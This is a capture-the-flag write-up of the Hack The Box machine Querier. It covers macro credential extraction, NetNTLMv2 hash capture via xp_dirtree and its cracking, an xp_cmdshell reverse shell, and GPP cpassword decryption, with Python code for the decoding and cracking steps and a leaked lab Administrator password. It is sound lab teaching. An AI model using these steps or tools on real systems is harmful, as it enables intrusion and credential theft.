# Hack The Box - Querier

## Quick Summary

Hey guys, today Querier retired and here’s my write-up about it. It was a great Windows machine covering some interesting stuff and I enjoyed it. I wrote two posts for this machine: this one solves it with Kali and the other one solves it with Commando VM, you can find the second post here. It’s a Windows box and its IP is 10.10.10.125; I added it to /etc/hosts as querier.htb. Let’s jump right in!

## Nmap

As always we start with nmap to scan for open ports and services (-sV for service versions, -sC for the default scripts, -sT for a full TCP connect scan):

```
nmap -sV -sT -sC querier.htb
```

The scan shows SMB and an MSSQL server on port 1433. Let’s check SMB first.

## Smb

First we need to list the shares; I used smbclient.

If any share is accessible anonymously it will be Reports, so let’s see what’s in there.

Only one file: an Excel workbook, Report.xlsm.

## MSSQL Credentials from Report.xlsm

An .xlsm workbook is just a zip archive, so I looked at its contents by opening it in the archive manager.

Inside the xl directory there is a vbaProject.bin, which means the workbook carries VBA macros, so I ran olevba from oletools on it to dump the macro source and see if there was anything useful in it.

Great, the macro contains the connection credentials for the MSSQL server.
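To show what olevba is doing for us here, the following is an added Python example written for this post (it is not the original post's code and not oletools code): it checks whether a workbook is macro-enabled by looking for xl/vbaProject.bin inside the zip, implements the MS-OVBA decompression that macro source is stored with, and greps the recovered VBA for connection-string credentials. Everything it operates on is constructed for the example: the workbook, the macro text and the host name and credentials in it are made up. A real vbaProject.bin is an OLE compound file in which the compressed module streams first have to be located (olevba does that part); this example skips the OLE layer and feeds the decoder a compressed stream directly, and the small literal-only encoder exists only to build that test input.

```python
import re
import struct
import zipfile
from io import BytesIO


def find_vba_project(xlsm_bytes: bytes):
    """An .xlsm is a zip archive; a macro-enabled workbook carries xl/vbaProject.bin.
    Return that part's raw bytes, or None if the workbook has no macros."""
    with zipfile.ZipFile(BytesIO(xlsm_bytes)) as zf:
        if "xl/vbaProject.bin" in zf.namelist():
            return zf.read("xl/vbaProject.bin")
    return None


def decompress_vba(stream: bytes) -> bytes:
    """Decode an MS-OVBA compressed container ([MS-OVBA] 2.4.1), the format module
    source is stored in inside vbaProject.bin (the decoding olevba does before it can
    print macro text). Layout: a 0x01 signature byte, then chunks made of a 2-byte
    header plus token data, each chunk yielding at most 4096 bytes."""
    if not stream or stream[0] != 0x01:
        raise ValueError("missing 0x01 container signature")
    out, pos = bytearray(), 1
    while pos < len(stream):
        if pos + 2 > len(stream):
            raise ValueError("truncated chunk header")
        header = struct.unpack_from("<H", stream, pos)[0]
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature")
        chunk_end = min(len(stream), pos + (header & 0x0FFF) + 3)  # header + data
        pos += 2
        chunk_start = len(out)                   # copy tokens never reach before this
        if not header & 0x8000:                  # flag bit clear: chunk stored raw
            out.extend(stream[pos:pos + 4096])
            pos += 4096
            continue
        while pos < chunk_end:
            flags = stream[pos]                  # one bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:       # literal token: one plain byte
                    out.append(stream[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", stream, pos)[0]   # copy token
                pos += 2
                # Offset/length bit split depends on how much of this chunk exists so far.
                produced = len(out) - chunk_start
                bit_count = max((produced - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                for i in range(length):          # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)


CRED_RE = re.compile(r"(User\s*Id|Uid|Password|Pwd)\s*=\s*([^;\"']+)", re.IGNORECASE)


def harvest_credentials(vba_source: str) -> dict:
    """Pull connection-string style credentials (User Id=..., Password=...) from macro text."""
    return {m.group(1).lower().replace(" ", ""): m.group(2).strip()
            for m in CRED_RE.finditer(vba_source)}


# ---- constructed test data; none of this is the real Report.xlsm -----------------

SAMPLE_MACRO = (                                 # made-up host and credentials
    b'Sub Connect()\r\n'
    b'    Set conn = CreateObject("ADODB.Connection")\r\n'
    b'    conn.Open "Provider=SQLOLEDB;Data Source=db.example.local;'
    b'User Id=report_user;Password=S3cret!;"\r\n'
    b'End Sub\r\n'
)


def compress_literal_only(data: bytes) -> bytes:
    """Wrap data in one valid chunk using only literal tokens (Office also emits copy
    tokens); exists only to build offline test input for decompress_vba."""
    if not 0 < len(data) <= 3640:                # flag bytes must keep chunk data <= 4096
        raise ValueError("sample must fit one literal-only chunk")
    body = bytearray()
    for i in range(0, len(data), 8):
        body.append(0x00)                        # flag byte: next eight tokens are literals
        body.extend(data[i:i + 8])
    header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
    return b"\x01" + struct.pack("<H", header) + bytes(body)


SAMPLE_STREAM = compress_literal_only(SAMPLE_MACRO)

# Hand-encoded chunk with a copy token: literals "ABCD", then token 0x3001
# (offset 4, length 4) replays them, so the chunk decodes to b"ABCDABCD".
COPY_TOKEN_STREAM = bytes([0x01, 0x06, 0xB0, 0x10, 0x41, 0x42, 0x43, 0x44, 0x01, 0x30])


def build_fake_xlsm(with_macros: bool) -> bytes:
    """Minimal zip shaped like a workbook. A real vbaProject.bin is an OLE container
    holding the module streams; here the part is the compressed stream itself."""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macros:
            zf.writestr("xl/vbaProject.bin", SAMPLE_STREAM)
    return buf.getvalue()
```

On a real workbook the useful sequence is find_vba_project, then an OLE parser to pull each module stream from its recorded offset, then decompress_vba and harvest_credentials; the copy-token path matters because Office-written streams are full of back-references, so a decoder that only handles literals will print garbage for real macros.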

## MSSQL

I used mssqlclient.py from impacket to connect to the server. The first attempt failed.

Adding the Windows authentication option (-windows-auth) made it work.

Unfortunately, this account is not allowed to run xp_cmdshell: permission denied.

xp_dirtree takes a path and happily follows a UNC path, which makes the SQL Server service account authenticate to whatever SMB server that path points at. So I ran responder (responder -I tun0) on my machine and called xp_dirtree with a UNC path pointing at it to see what hashes I could catch.

And we got the NetNTLMv2 hash for mssql-svc, the account SQL Server runs as.
I used john with rockyou to crack it.
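Why the capture above can be cracked offline at all: the NTProofStr that responder prints is an HMAC-MD5 over the server challenge and the client blob, keyed by a value derived from the NT hash of the password, so a wordlist attack simply recomputes it for each candidate and compares. The following is an added Python example written for this post (not the original post's code and not john's or responder's) that implements that check from scratch, including MD4, since hashlib frequently lacks it under OpenSSL 3. The sample line it checks is constructed with a fixed challenge, a minimal blob and a made-up password; it is not the capture from the box.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(message: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks md4 under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = (  # (function, message-word order, shift amounts, additive constant)
        (F, list(range(16)), (3, 7, 11, 19), 0),
        (G, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    # Pad: 0x80, zeros up to 56 mod 64, then the bit length as a little-endian 64-bit int.
    msg = message + b"\x80" + b"\x00" * ((55 - len(message)) % 64) + struct.pack("<Q", 8 * len(message))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for f, order, shifts, const in rounds:
            for i in range(16):
                t = (-i) % 4  # the register being updated cycles a, d, c, b
                v[t] = rotl((v[t] + f(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4])
                             + X[order[i]] + const) & MASK, shifts[i % 4])
        state = [(s + x) & MASK for s, x in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password, the value stored in the SAM / NTDS."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr (MS-NLMP 3.3.2): HMAC-MD5 keyed with NTOWFv2 over challenge || blob,
    where NTOWFv2 = HMAC-MD5(nt_hash, UTF-16LE(UPPER(user) + domain))."""
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()


def parse_netntlmv2(line: str) -> dict:
    """Split the responder/john line format USER::DOMAIN:challenge:NTProofStr:blob (hex fields)."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def check_candidate(line: str, password: str) -> bool:
    """One wordlist iteration of what john does: recompute NTProofStr and compare."""
    h = parse_netntlmv2(line)
    guess = ntlmv2_proof(password, h["user"], h["domain"], h["challenge"], h["blob"])
    return hmac.compare_digest(guess, h["proof"])


def format_netntlmv2(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Produce a capture line from a known password (what the client side computes);
    used here only to build constructed test input."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample, not the capture from the box: a fixed 8-byte server challenge and a
# minimal NTLMv2 blob (0x0101 header, reserved, timestamp, client nonce, empty AV pairs).
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" "0000000000000000" "aabbccddeeff0011" "00000000" "00000000" "00000000")
SAMPLE_LINE = format_netntlmv2("mssql-svc", "QUERIER", "password", SAMPLE_CHALLENGE, SAMPLE_BLOB)
```

The user name is uppercased before keying but the domain is used as captured, which is why a hash line with the wrong case in the domain field will never crack; it is also why NetNTLMv2 cannot be passed-the-hash: the proof is bound to this one challenge and blob, so the only use of the capture is a dictionary attack like the one above.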

Now that we have the mssql-svc credentials it’s time to reconnect with them, enable xp_cmdshell and get a reverse shell.

We have RCE. I ran a Python web server to host nc.exe and used Invoke-WebRequest through xp_cmdshell to download it.

Then I got a reverse shell.

We owned user!

## GPP, Privilege Escalation, Root Flag

One of the things to check when enumerating Windows machines is Group Policy Preferences (GPP) passwords, which happened to be the privilege escalation vector here. GPP let administrators set local account passwords through policy, and the cpassword value stored in Groups.xml is encrypted with an AES key that Microsoft itself published, so anyone who can read the file can recover the password. I checked for GPP passwords and found the Administrator’s.

The relevant entry is in Groups.xml.

We still need to decrypt the cpassword value, which is easily done with gpp-decrypt.

The password is MyUnclesAreMarioAndLuigi!!1!. We can use it with psexec.py from impacket to get a shell as SYSTEM.
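What gpp-decrypt actually does with that cpassword, as an added Python example written for this post (it is neither the original post's code nor the gpp-decrypt tool's): the value is base64 with the padding stripped, and underneath it is AES-256-CBC ciphertext under the key Microsoft published in its GPP documentation, with an all-zero IV, PKCS#7 padding and a UTF-16LE plaintext. AES is implemented inline so the block runs without third-party packages; the only expected values it carries are the FIPS-197 AES-256 test vector and two S-box entries, and the real cpassword from the box is not reproduced here.

```python
import base64

# AES-256 key Microsoft published in its GPP documentation (MS14-025 stopped new passwords
# being stored this way, but any Groups.xml still lying around stays decryptable).
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def _xtime(a: int) -> int:
    return ((a << 1) ^ 0x11B) & 0xFF if a & 0x80 else a << 1


def _gmul(a: int, b: int) -> int:
    """Multiply in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def _build_sboxes():
    """Derive the S-box (field inverse, then the affine map) instead of pasting a table."""
    sbox, inv = [0] * 256, [0] * 256
    for a in range(256):
        x = next((b for b in range(256) if _gmul(a, b) == 1), 0)
        s = 0x63
        for i in range(5):
            s ^= ((x << i) | (x >> (8 - i))) & 0xFF
        sbox[a], inv[s] = s, a
    return sbox, inv


SBOX, INV_SBOX = _build_sboxes()


def _expand_key(key: bytes):
    """FIPS-197 key schedule; returns nr+1 round keys of 16 bytes (14 rounds for AES-256)."""
    nk = len(key) // 4
    nr = nk + 6
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    rcon = 1
    for i in range(nk, 4 * (nr + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif nk > 6 and i % nk == 4:
            t = [SBOX[b] for b in t]               # extra SubWord for 256-bit keys
        w.append([w[i - nk][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nr + 1)]


def _inv_shift_sub(s):
    """InvShiftRows then InvSubBytes on a column-major state (index r + 4c)."""
    return [INV_SBOX[s[r + 4 * ((c - r) % 4)]] for c in range(4) for r in range(4)]


def _decrypt_block(rks, block: bytes) -> bytes:
    nr = len(rks) - 1
    s = [b ^ k for b, k in zip(block, rks[nr])]
    for rnd in range(nr - 1, 0, -1):
        s = [b ^ k for b, k in zip(_inv_shift_sub(s), rks[rnd])]
        mixed = []
        for c in range(4):                        # InvMixColumns
            a0, a1, a2, a3 = s[4 * c:4 * c + 4]
            mixed += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                      _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                      _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                      _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
        s = mixed
    return bytes(b ^ k for b, k in zip(_inv_shift_sub(s), rks[0]))


def aes256_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    rks = _expand_key(key)
    out, prev = bytearray(), iv
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        out += bytes(p ^ c for p, c in zip(_decrypt_block(rks, block), prev))
        prev = block
    return bytes(out)


def decrypt_cpassword(cpassword: str) -> str:
    """What gpp-decrypt does: restore the base64 padding Microsoft strips, AES-256-CBC
    decrypt with the published key and an all-zero IV, strip PKCS#7, decode UTF-16LE."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if not raw or len(raw) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    plain = aes256_cbc_decrypt(GPP_KEY, bytes(16), raw)
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword?")
    return plain[:-pad].decode("utf-16-le")
```

Feed decrypt_cpassword the cpassword attribute copied out of Groups.xml. The padding check is worth keeping: a value that is not really a GPP password (or that was mangled in transit) decrypts to noise under this fixed key, and the PKCS#7 check is what turns that into an error instead of a garbage string.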

And we owned root!
That’s it, feedback is appreciated!